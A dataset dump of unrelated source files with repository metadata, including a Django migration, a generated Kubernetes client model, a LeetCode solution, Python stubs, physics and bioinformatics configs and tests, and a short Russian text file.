3254f277b9f7bc17109e5f0eb6f62261ecc84387 | 9d278285f2bc899ac93ec887b1c31880ed39bf56 | /ondoc/diagnostic/migrations/0143_merge_20190102_1610.py | 600e06ca0f55228ae1e74f57b7435416c88120fa | [] | no_license | ronit29/docprime | 945c21f8787387b99e4916cb3ba1618bc2a85034 | 60d4caf6c52a8b70174a1f654bc792d825ba1054 | refs/heads/master | 2023-04-01T14:54:10.811765 | 2020-04-07T18:57:34 | 2020-04-07T18:57:34 | 353,953,576 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 279 | py | # Generated by Django 2.0.5 on 2019-01-02 10:40
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('diagnostic', '0142_auto_20181229_0505'),
('diagnostic', '0139_auto_20181231_1658'),
]
operations = [
]
| [
"[email protected]"
] | |
fc03b2addf535c39046c40df168afe7cabd0e67c | 14bca3c05f5d8de455c16ec19ac7782653da97b2 | /lib/kubernetes/client/models/v1_local_object_reference.py | 8bdf99cde581bc3d3abefcc9897708676fc092bb | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | hovu96/splunk_as_a_service_app | 167f50012c8993879afbeb88a1f2ba962cdf12ea | 9da46cd4f45603c5c4f63ddce5b607fa25ca89de | refs/heads/master | 2020-06-19T08:35:21.103208 | 2020-06-16T19:07:00 | 2020-06-16T19:07:00 | 196,641,210 | 8 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,380 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.14.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1LocalObjectReference(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str'
}
attribute_map = {
'name': 'name'
}
def __init__(self, name=None):
"""
V1LocalObjectReference - a model defined in Swagger
"""
self._name = None
self.discriminator = None
if name is not None:
self.name = name
@property
def name(self):
"""
Gets the name of this V1LocalObjectReference.
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:return: The name of this V1LocalObjectReference.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this V1LocalObjectReference.
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param name: The name of this V1LocalObjectReference.
:type: str
"""
self._name = name
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1LocalObjectReference):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"[email protected]"
] | |
8ead76d7340deb6bd81fc2eadd7a573efbba4100 | b027af825501f40157921456778e0c2b4a15c313 | /981. Time Based Key-Value Store.py | 58d5a5d50bd834b2811f5474b3f41618627561f5 | [] | no_license | Eustaceyi/Leetcode | bba9db25d940aa1a3ea95b7a97319005adb58655 | 237985eea9853a658f811355e8c75d6b141e40b2 | refs/heads/master | 2020-05-19T08:04:37.101702 | 2020-02-02T01:43:05 | 2020-02-02T01:43:05 | 184,912,241 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 730 | py | class TimeMap:
def __init__(self):
"""
Initialize your data structure here.
"""
self.d = {}
def set(self, key: str, value: str, timestamp: int) -> None:
if key not in self.d:
self.d[key] = [(timestamp, value)]
else:
self.d[key].append((timestamp, value))
def get(self, key: str, timestamp: int) -> str:
if key not in self.d:
return ''
else:
i = bisect.bisect(self.d[key], (timestamp, chr(127)))
return self.d[key][i-1][1] if i else ''
# Your TimeMap object will be instantiated and called as such:
# obj = TimeMap()
# obj.set(key,value,timestamp)
# param_2 = obj.get(key,timestamp) | [
"[email protected]"
] | |
9827030868fdbec7d08cc003e957a3ab49091c27 | 2aace9bb170363e181eb7520e93def25f38dbe5c | /build/idea-sandbox/system/python_stubs/cache/615fe5511019f4d9377f3903f87a6e0b5f40a3c520ef52ec49ceeaa834141943/typing/io.py | aba44effd2b04593bdce89e5f191dfa3f72ded87 | [] | no_license | qkpqkp/PlagCheck | 13cb66fd2b2caa2451690bb72a2634bdaa07f1e6 | d229904674a5a6e46738179c7494488ca930045e | refs/heads/master | 2023-05-28T15:06:08.723143 | 2021-06-09T05:36:34 | 2021-06-09T05:36:34 | 375,235,940 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,377 | py | # encoding: utf-8
# module typing.io
# from C:\Users\Doly\Anaconda3\lib\site-packages\pandas\_libs\missing.cp37-win_amd64.pyd
# by generator 1.147
""" Wrapper namespace for IO generic classes. """
# imports
import typing as __typing
# no functions
# classes
class IO(__typing.Generic):
"""
Generic base class for TextIO and BinaryIO.
This is an abstract, generic version of the return of open().
NOTE: This does not distinguish between the different possible
classes (text vs. binary, read vs. write vs. read/write,
append-only, unbuffered). The TextIO and BinaryIO subclasses
below capture the distinctions between text vs. binary, which is
pervasive in the interface; however we currently do not offer a
way to track the other distinctions in the type system.
"""
def close(self): # reliably restored by inspect
# no doc
pass
def closed(self): # reliably restored by inspect
# no doc
pass
def fileno(self): # reliably restored by inspect
# no doc
pass
def flush(self): # reliably restored by inspect
# no doc
pass
def isatty(self): # reliably restored by inspect
# no doc
pass
def read(self, n=-1): # reliably restored by inspect
# no doc
pass
def readable(self): # reliably restored by inspect
# no doc
pass
def readline(self, limit=-1): # reliably restored by inspect
# no doc
pass
def readlines(self, hint=-1): # reliably restored by inspect
# no doc
pass
def seek(self, offset, whence=0): # reliably restored by inspect
# no doc
pass
def seekable(self): # reliably restored by inspect
# no doc
pass
def tell(self): # reliably restored by inspect
# no doc
pass
def truncate(self, size=None): # reliably restored by inspect
# no doc
pass
def writable(self): # reliably restored by inspect
# no doc
pass
def write(self, s): # reliably restored by inspect
# no doc
pass
def writelines(self, lines): # reliably restored by inspect
# no doc
pass
def __enter__(self): # reliably restored by inspect
# no doc
pass
def __exit__(self, type, value, traceback): # reliably restored by inspect
# no doc
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
mode = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__orig_bases__ = (
typing.Generic[~AnyStr],
)
__parameters__ = (
None, # (!) real value is '~AnyStr'
)
__slots__ = ()
class BinaryIO(__typing.IO):
""" Typed version of the return of open() in binary mode. """
def write(self, s): # reliably restored by inspect
# no doc
pass
def __enter__(self): # reliably restored by inspect
# no doc
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
__orig_bases__ = (
typing.IO[bytes],
)
__parameters__ = ()
__slots__ = ()
class TextIO(__typing.IO):
""" Typed version of the return of open() in text mode. """
def __enter__(self): # reliably restored by inspect
# no doc
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
buffer = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
encoding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
errors = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
line_buffering = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
newlines = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__orig_bases__ = (
typing.IO[str],
)
__parameters__ = ()
__slots__ = ()
# variables with complex values
__all__ = [
'IO',
'TextIO',
'BinaryIO',
]
__weakref__ = None # (!) real value is "<attribute '__weakref__' of 'typing.io' objects>"
| [
"[email protected]"
] | |
812d33ceecf8a2ed47eb5c83d1e0225481655f44 | f338eb32c45d8d5d002a84798a7df7bb0403b3c4 | /Calibration/IsolatedParticles/test/proto_runIsolatedTracksHcal_cfg.py | 34200f8e49f76ae0284d76dd370be5ac5a950c7c | [] | permissive | wouf/cmssw | 0a8a8016e6bebc611f1277379e12bef130464afb | 60da16aec83a0fc016cca9e2a5ed0768ba3b161c | refs/heads/CMSSW_7_3_X | 2022-06-30T04:35:45.380754 | 2015-05-08T17:40:17 | 2015-05-08T17:40:17 | 463,028,972 | 0 | 0 | Apache-2.0 | 2022-02-24T06:05:30 | 2022-02-24T06:05:26 | null | UTF-8 | Python | false | false | 2,875 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("L1SKIM")
process.load("FWCore.MessageService.MessageLogger_cfi")
process.MessageLogger.cerr.FwkReport.reportEvery = 10
process.MessageLogger.categories.append('L1GtTrigReport')
process.MessageLogger.categories.append('HLTrigReport')
process.options = cms.untracked.PSet(
wantSummary = cms.untracked.bool(False)
)
#process.load(INPUTFILELIST)
process.source = cms.Source("PoolSource",fileNames =cms.untracked.vstring(
'/store/mc/Summer10/DiPion_E1to300/GEN-SIM-RECO/START36_V9_S09-v1/0024/4CEE3150-E581-DF11-B9C4-001A92971BDC.root'
))
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(50) )
##################### digi-2-raw plus L1 emulation #########################
process.load("Configuration.StandardSequences.Services_cff")
process.load('Configuration/StandardSequences/GeometryExtended_cff')
process.load('Configuration/StandardSequences/MagneticField_38T_cff')
process.load('TrackingTools/TrackAssociator/DetIdAssociatorESProducer_cff')
#################### Conditions and L1 menu ################################
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
#process.GlobalTag.globaltag = 'START3X_V25B::All'
#process.GlobalTag.globaltag = 'START3X_V27::All'
process.GlobalTag.globaltag = 'START36_V10::All'
process.load('Calibration.IsolatedParticles.isolatedTracksHcalScale_cfi')
process.isolatedTracksHcal.MaxDxyPV = 10.
process.isolatedTracksHcal.MaxDzPV = 10.
process.isolatedTracksHcal.Verbosity = 1
process.primaryVertexFilter = cms.EDFilter("GoodVertexFilter",
vertexCollection = cms.InputTag('offlinePrimaryVertices'),
minimumNDOF = cms.uint32(4) ,
maxAbsZ = cms.double(20.0),
maxd0 = cms.double(10.0)
)
process.TFileService = cms.Service("TFileService",
fileName = cms.string('IsolatedTracksHcalScale.root')
)
# define an EndPath to analyze all other path results
process.hltTrigReport = cms.EDAnalyzer( 'HLTrigReport',
#HLTriggerResults = cms.InputTag( 'TriggerResults','','REDIGI36X')
HLTriggerResults = cms.InputTag( 'TriggerResults','','HLT')
)
process.load("L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi")
#process.l1GtTrigReport.L1GtRecordInputTag = 'simGtDigis'
process.l1GtTrigReport.L1GtRecordInputTag = 'gtDigis'
process.l1GtTrigReport.PrintVerbosity = 0
#=============================================================================
#process.p1 = cms.Path(process.primaryVertexFilter*process.isolatedTracksHcal)
process.p1 = cms.Path( process.isolatedTracksHcal )
| [
"[email protected]"
] | |
eacdc0def0769b9ac87a01477d979d10893e999e | 3345fd9994269b2617e5cbd8f9de879f61544341 | /sklearn_theano/utils/validation.py | 2d75fff7123bf8f257d8b510f1be458631604271 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | khaoulabelahsen/sklearn-theano | 63f927c61732601f684e36d28e9f029246b84a20 | a159d63b913c4f3a7abfb5a46a97a5a39bbc793f | refs/heads/master | 2021-05-18T13:30:17.228526 | 2020-03-30T09:54:29 | 2020-03-30T09:54:29 | 251,263,043 | 1 | 0 | BSD-3-Clause | 2020-03-30T09:45:51 | 2020-03-30T09:45:51 | null | UTF-8 | Python | false | false | 1,974 | py | """Utilities for input validation"""
# License: BSD 3 clause
import numpy as np
def get_minibatch_indices(array, minibatch_size):
""" Get indices for minibatch processing.
Parameters
----------
array : object
Input object to get indices for
minibatch_size : int
Size of minibatches
Returns
-------
list_of_indices : object
A list of (start_index, end_index) tuples.
"""
minibatch_indices = np.arange(0, len(array), minibatch_size)
minibatch_indices = np.asarray(list(minibatch_indices) + [len(array)])
start_indices = minibatch_indices[:-1]
end_indices = minibatch_indices[1:]
return zip(start_indices, end_indices)
def check_tensor(array, dtype=None, order=None, n_dim=None, copy=False):
"""Input validation on an array, or list.
By default, the input is converted to an at least 2nd numpy array.
Parameters
----------
array : object
Input object to check / convert.
dtype : object
Input type to check / convert.
n_dim : int
Number of dimensions for input array. If smaller, input array will be
appended by dimensions of length 1 until n_dims is matched.
order : 'F', 'C' or None (default=None)
Whether an array will be forced to be fortran or c-style.
copy : boolean (default=False)
Whether a forced copy will be triggered. If copy=False, a copy might
be triggered by a conversion.
Returns
-------
X_converted : object
The converted and validated X.
"""
array = np.array(array, dtype=dtype, order=order, copy=copy)
if n_dim is not None:
if len(array.shape) > n_dim:
raise ValueError("Input array has shape %s, expected array with "
"%s dimensions or less" % (array.shape, n_dim))
elif len(array.shape) < n_dim:
array = array[[np.newaxis] * (n_dim - len(array.shape))]
return array
| [
"[email protected]"
] | |
ef126642a60cbf935062792af151179cfa4acb7e | 11c24617b0f62bc55b7d2f34eb65fa63e3e3ec06 | /Stacks and Queues - Exercise/10. Cups and Bottles.py | 05eea022bd503beddd8750833b08dd39d18c3a5e | [] | no_license | SilviaKoynova/Python-Advanced | 2d1750a4943b82a82ec910d29241bd3fc473289e | 0a94556592bca60b29a85849a5e694f2eeeda52b | refs/heads/main | 2023-07-18T05:41:33.641250 | 2021-08-26T21:15:13 | 2021-08-26T21:15:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,155 | py | from collections import deque
cups_capacity = list(map(int, input().split()))
bottles_with_watter = list(map(int, input().split()))
cups = deque(cups_capacity)
wasted_water = 0
while cups and bottles_with_watter:
current_cup = cups[0]
current_bottle = bottles_with_watter[-1]
if current_cup > current_bottle:
reduced_value = current_cup - current_bottle
current_bottle = bottles_with_watter.pop()
while reduced_value > 0 and bottles_with_watter:
next_bottle = bottles_with_watter[-1]
if next_bottle > reduced_value:
wasted_water += (next_bottle - reduced_value)
reduced_value -= next_bottle
else:
reduced_value -= next_bottle
bottles_with_watter.pop()
cups.popleft()
else:
wasted_water += current_bottle - current_cup
bottles_with_watter.pop()
cups.popleft()
if bottles_with_watter:
print(f"Bottles: {' '.join(map(str, bottles_with_watter))}")
elif cups:
print(f"Cups: {' '.join(map(str, cups))}")
print(f"Wasted litters of water: {wasted_water}")
| [
"[email protected]"
] | |
bd543a56885e63c0880db093f6cc7f3b0a5aebd7 | d3cd9012fb535f304d23635145d3fbe71fdbf17e | /geonames/fileutils.py | 7bb9513b06e9cfb8f77f8e62e5dac124d7991570 | [
"Apache-2.0",
"CC-BY-3.0"
] | permissive | flyingdice/geonames-sqlite | 38023e8ffc2e6ff47ee614fc7ea223bfa3079cc2 | acf51d9af723d46815c43509ce22712ce910a61e | refs/heads/master | 2023-02-18T02:06:44.676771 | 2021-01-20T01:48:00 | 2021-01-20T01:48:00 | 109,519,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 705 | py | """
geonames/fileutils
~~~~~~~~~~~~~~~~~~
Contains utility functions for files.
"""
from typing import IO
def peek_line(f: IO) -> str:
"""
Peek the next line of the given file obj without progressing the pointer.
"""
pos = f.tell()
data = f.readline()
f.seek(pos)
return data
def is_comment(line: str) -> bool:
"""
Return True if the given line is a comment, False otherwise.
"""
return line.startswith('#')
def skip_comments(f: IO) -> None:
"""
Progress the given file obj past all comment lines.
"""
while True:
line = peek_line(f)
if not line or not is_comment(line):
break
f.readline()
| [
"[email protected]"
] | |
20719f4d841e021eca7cb85b8fe056e631ae325c | 91824d746654fe12881b4fc3b55c553aae0d22ac | /py/count-numbers-with-unique-digits.py | 627afa761d56db8cd55409afa5f4afa8c3a6a30b | [
"Apache-2.0"
] | permissive | ckclark/leetcode | a1a173c67a36a3256b198f853fcd3d15aa5abbb7 | 844c6f18d06dcb397db76436e5f4b8ddcb1beddc | refs/heads/master | 2021-01-15T08:14:43.368516 | 2020-02-14T07:25:05 | 2020-02-14T07:30:10 | 42,386,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 310 | py | class Solution(object):
def countNumbersWithUniqueDigits(self, n):
"""
:type n: int
:rtype: int
"""
n = min(10, n)
ans = 1
for i in xrange(10 - (n - 1), 10 + 1):
ans = ans * i + 1
ans *= 9
ans /= 10
return ans + 1
| [
"[email protected]"
] | |
e83f691304be7f8aaee96e7151f7442647d2fb7c | ac9b453759dbab67d92f88942b7ac41b337e003d | /hudson/hudson-scripts/qiime/test_tree_compare.py | 41856e1636672dce3233f85b256d692af20cdd73 | [] | no_license | carze/clovr-base | 12d8dd405136643b889c3752a360a2efc9405f45 | 617bcb84b087f80a5d5e74ad7ef1616a369d2306 | refs/heads/master | 2021-01-24T01:39:55.353409 | 2014-11-05T15:06:05 | 2014-11-05T15:06:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,386 | py | #!/usr/bin/env python
__author__ = "Justin Kuczynski"
__copyright__ = "Copyright 2010, The QIIME Project"
__credits__ = ["Justin Kuczynski"]
__license__ = "GPL"
__version__ = "1.1.0"
__maintainer__ = "Justin Kuczynski"
__email__ = "[email protected]"
__status__ = "Release"
"""tests the tree_compare.py module."""
from cogent.util.unit_test import TestCase, main
from qiime.parse import parse_newick
import qiime.tree_compare as tc
class TreeCompareTests(TestCase):
""" tests only top level functions
"""
def test_bootstrap_support(self):
""" bootstrap_support should have correct bootstrap for a tree with
unlabeled internal nodes
"""
master_tree = parse_newick('((a:2,b:3):2,(c:1,d:2):7);')
"""
/-------.5 /-a
---1| \-b
\------.5 /-c
\-d
"""
t1 = parse_newick('((a:6,b:8.2):2,(c:1,d:2):7);') # same structure
t2 = parse_newick('((a:2,b:3,c:33):2,d:7);') # abc are siblings
new_master, bootstraps = tc.bootstrap_support(master_tree, [t1, t2])
self.assertFloatEqual(sorted(bootstraps.values()),sorted([1.0, .5, .5]))
def test_bootstrap_support_labeled(self):
""" bootstrap_support should have correct bootstrap on a tree
with labeled internal nodes
"""
master_tree = parse_newick('((a:2,b:3)ab:2,(c:1,d:2)cd:7)rt;')
"""
/-------.5 /-a
---1| \-b
\------.5 /-c
\-d
"""
t1 = parse_newick('((a:6,b:8.2)hi:2,(c:1,d:2):7);') # same structure
t2 = parse_newick('((a:2,b:3,c:33)ho:2,d:7);') # abc are siblings
new_master, bootstraps = tc.bootstrap_support(master_tree, [t1, t2])
expected = dict([('ab', .5),('cd',.5),('rt',1.0)])
self.assertFloatEqual(bootstraps, expected)
def test_bootstrap_support_subset(self):
""" bootstrap_support should have correct bootstrap on a tree
when one support tree is missing a tip
"""
master_tree = parse_newick('((a:2,b:3)ab:2,(c:1,d:2)cd:7)rt;')
"""
/-------.5 /-a
---1| \-b
\------.5 /-c
\-d
"""
t1 = parse_newick('((a:6,b:8.2)hi:2,(c:1,d:2):7);') # same structure
t2 = parse_newick('((a:2,b:3,c:33)ho:2,d:7);') # abc are siblings
t3 = parse_newick('((a:6)hi:2,(c:1,d:2):7);') # b missing
t4 = parse_newick('(a:8,(c:1,d:2):7);') # b missing, and pruned
new_master, bootstraps = tc.bootstrap_support(master_tree,
[t1, t2,t3,t4])
expected = dict([('cd',.75),('rt',1.0)])
self.assertFloatEqual(bootstraps, expected)
def test_tree_support(self):
""" tree_support should correctly modify node.bootstrap_support
"""
master_tree = parse_newick('((a:2,b:3)ab:2,(c:1,d:2)cd:7)rt;')
"""
/-------.5 /-a
---1| \-b
\------.5 /-c
\-d
"""
t2 = parse_newick('((a:2,b:3,c:33)ho:2,d:7);') # abc are siblings
tc.tree_support(master_tree, t2)
self.assertFloatEqual(\
master_tree.getNodeMatchingName('rt').bootstrap_support,1.0)
if __name__ =='__main__':
main()
| [
"[email protected]"
] | |
9f882bb61120cc1a2aa888581ffeef7eb9ebc90f | 8ad9faa828ce54cddc38dc86eef30e6635babd0c | /RestPy/ixnetwork_restpy/testplatform/sessions/ixnetwork/globals/topology/openflowcontroller/instructions.py | b089f7f273ad469a5399bb17b1a314f0423ac06b | [
"MIT"
] | permissive | ralfjon/IxNetwork | d1a50069bc5a211f062b2b257cb6775e7cae8689 | c0c834fbc465af69c12fd6b7cee4628baba7fff1 | refs/heads/master | 2020-04-04T00:36:24.956925 | 2018-10-26T16:37:13 | 2018-10-26T16:37:13 | 155,655,988 | 0 | 0 | MIT | 2018-11-01T03:19:30 | 2018-11-01T03:19:30 | null | UTF-8 | Python | false | false | 3,717 | py |
# Copyright 1997 - 2018 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class Instructions(Base):
"""The Instructions class encapsulates a required instructions node in the ixnetwork hierarchy.
An instance of the class can be obtained by accessing the Instructions property from a parent instance.
The internal properties list will contain one and only one set of properties which is populated when the property is accessed.
"""
_SDM_NAME = 'instructions'
def __init__(self, parent):
super(Instructions, self).__init__(parent)
@property
def Instruction(self):
"""An instance of the Instruction class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.globals.topology.openflowcontroller.instruction.Instruction)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.globals.topology.openflowcontroller.instruction import Instruction
return Instruction(self)
@property
def Count(self):
"""Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group
Returns:
number
"""
return self._get_attribute('count')
@property
def Description(self):
"""Description of the TLV prototype.
Returns:
str
"""
return self._get_attribute('description')
@Description.setter
def Description(self, value):
self._set_attribute('description', value)
@property
def IsEditable(self):
"""Information on the requirement of the field.
Returns:
bool
"""
return self._get_attribute('isEditable')
@IsEditable.setter
def IsEditable(self, value):
self._set_attribute('isEditable', value)
@property
def IsRepeatable(self):
"""Information if the field can be multiplied in the tlv definition.
Returns:
bool
"""
return self._get_attribute('isRepeatable')
@IsRepeatable.setter
def IsRepeatable(self, value):
self._set_attribute('isRepeatable', value)
@property
def IsRequired(self):
"""Information on the requirement of the field.
Returns:
bool
"""
return self._get_attribute('isRequired')
@IsRequired.setter
def IsRequired(self, value):
self._set_attribute('isRequired', value)
@property
def Name(self):
"""Name of the TLV field.
Returns:
str
"""
return self._get_attribute('name')
@Name.setter
def Name(self, value):
self._set_attribute('name', value)
| [
"[email protected]"
] | |
e2ee40c43a7150a5d6cee96817a5c77f7357f557 | d1a4e71c407c52d28914570c684d2be2f03d1cd2 | /tensorflow/python/keras/layers/preprocessing/text_vectorization_distribution_test.py | 61fb62f7885dec08d19c28211ebc412e7d18f9ed | [
"Apache-2.0"
] | permissive | WindQAQ/tensorflow | f43dd80e1b6004f2443faf2eb310dbcb19ae9796 | 4f4e5f4196e243b33fd218bc9fc910e275b1f22b | refs/heads/master | 2021-07-05T05:55:38.374488 | 2021-03-12T04:51:17 | 2021-03-12T04:51:17 | 190,140,026 | 1 | 0 | Apache-2.0 | 2019-06-04T06:09:54 | 2019-06-04T06:09:53 | null | UTF-8 | Python | false | false | 4,191 | py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Distribution tests for keras.layers.preprocessing.text_vectorization."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations as ds_combinations
from tensorflow.python.eager import context
from tensorflow.python.framework import config
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_combinations as combinations
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras.distribute.strategy_combinations import all_strategies
from tensorflow.python.keras.layers.preprocessing import preprocessing_test_utils
from tensorflow.python.keras.layers.preprocessing import text_vectorization
from tensorflow.python.keras.layers.preprocessing import text_vectorization_v1
from tensorflow.python.platform import test
def get_layer_class():
if context.executing_eagerly():
return text_vectorization.TextVectorization
else:
return text_vectorization_v1.TextVectorization
@ds_combinations.generate(
combinations.combine(
distribution=all_strategies,
mode=["eager", "graph"]))
class TextVectorizationDistributionTest(
keras_parameterized.TestCase,
preprocessing_test_utils.PreprocessingLayerTest):
def test_distribution_strategy_output(self, distribution):
vocab_data = ["earth", "wind", "and", "fire"]
input_array = np.array([["earth", "wind", "and", "fire"],
["fire", "and", "earth", "michigan"]])
input_dataset = dataset_ops.Dataset.from_tensor_slices(input_array).batch(
2, drop_remainder=True)
expected_output = [[2, 3, 4, 5], [5, 4, 2, 1]]
config.set_soft_device_placement(True)
with distribution.scope():
input_data = keras.Input(shape=(None,), dtype=dtypes.string)
layer = get_layer_class()(
max_tokens=None,
standardize=None,
split=None,
output_mode=text_vectorization.INT)
layer.set_vocabulary(vocab_data)
int_data = layer(input_data)
model = keras.Model(inputs=input_data, outputs=int_data)
output_dataset = model.predict(input_dataset)
self.assertAllEqual(expected_output, output_dataset)
def test_distribution_strategy_output_with_adapt(self, distribution):
vocab_data = [[
"earth", "earth", "earth", "earth", "wind", "wind", "wind", "and",
"and", "fire"
]]
vocab_dataset = dataset_ops.Dataset.from_tensors(vocab_data)
input_array = np.array([["earth", "wind", "and", "fire"],
["fire", "and", "earth", "michigan"]])
input_dataset = dataset_ops.Dataset.from_tensor_slices(input_array).batch(
2, drop_remainder=True)
expected_output = [[2, 3, 4, 5], [5, 4, 2, 1]]
config.set_soft_device_placement(True)
with distribution.scope():
input_data = keras.Input(shape=(None,), dtype=dtypes.string)
layer = get_layer_class()(
max_tokens=None,
standardize=None,
split=None,
output_mode=text_vectorization.INT)
layer.adapt(vocab_dataset)
int_data = layer(input_data)
model = keras.Model(inputs=input_data, outputs=int_data)
output_dataset = model.predict(input_dataset)
self.assertAllEqual(expected_output, output_dataset)
if __name__ == "__main__":
test.main()
| [
"[email protected]"
] | |
fc7c24ed77a547bd786367f500d47a40c1ac668c | bc61b2d61e0d7c119ad40432490a35e49c2af374 | /src/opencmiss/extensions/airwaysmask/utils.py | 418ee6e288308afb4f2d4c8d26af8e38fb44cf52 | [
"Apache-2.0"
] | permissive | hsorby/neon.extension.airwaysmask | 28c2be8d685d9bf72f7704c549bca11c286ce305 | 2d9da30c569e1fcdd0819a6512e570b3d8c9efda | refs/heads/master | 2020-03-27T02:28:06.928298 | 2018-08-29T21:36:27 | 2018-08-29T21:36:27 | 145,792,604 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,007 | py |
def generate_offset_cube_coordinates(dimensions):
"""
Create a set of eight 3D coordinates that are offset by 0.5. In this case the 0.5 is a pixel so that
the centre of the voxel is at the integer coordinate location.
:param dimensions: A list of size three containing the dimensions of the cube.
:return: A list of 3D coordinates for the offset cube.
"""
node_coordinate_set = [[0 - 0.5, 0 - 0.5, 0 - 0.5],
[dimensions[0] + 0.5, 0 - 0.5, 0 - 0.5],
[0 - 0.5, dimensions[1] + 0.5, 0 - 0.5],
[dimensions[0] + 0.5, dimensions[1] + 0.5, 0 - 0.5],
[0 - 0.5, 0 - 0.5, dimensions[2] + 0.5],
[dimensions[0] + 0.5, 0 - 0.5, dimensions[2] + 0.5],
[0 - 0.5, dimensions[1] + 0.5, dimensions[2] + 0.5],
[dimensions[0] + 0.5, dimensions[1] + 0.5, dimensions[2] + 0.5]]
return node_coordinate_set
| [
"[email protected]"
] | |
4031eec86fa97d01395a6c182056643b6b8fd372 | 33524b5c049f934ce27fbf046db95799ac003385 | /2017/файлы/write_test.txt | c85aa4e7ccd9f59fca496675eb77169c3c84b5f4 | [] | no_license | mgbo/My_Exercise | 07b5f696d383b3b160262c5978ad645b46244b70 | 53fb175836717493e2c813ecb45c5d5e9d28dd23 | refs/heads/master | 2022-12-24T14:11:02.271443 | 2020-10-04T04:44:38 | 2020-10-04T04:44:38 | 291,413,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | txt | сейчас я учусь в институте МФТИ.
меня зовут мье маунг. Меня интересует информатика.
| [
"[email protected]"
] | |
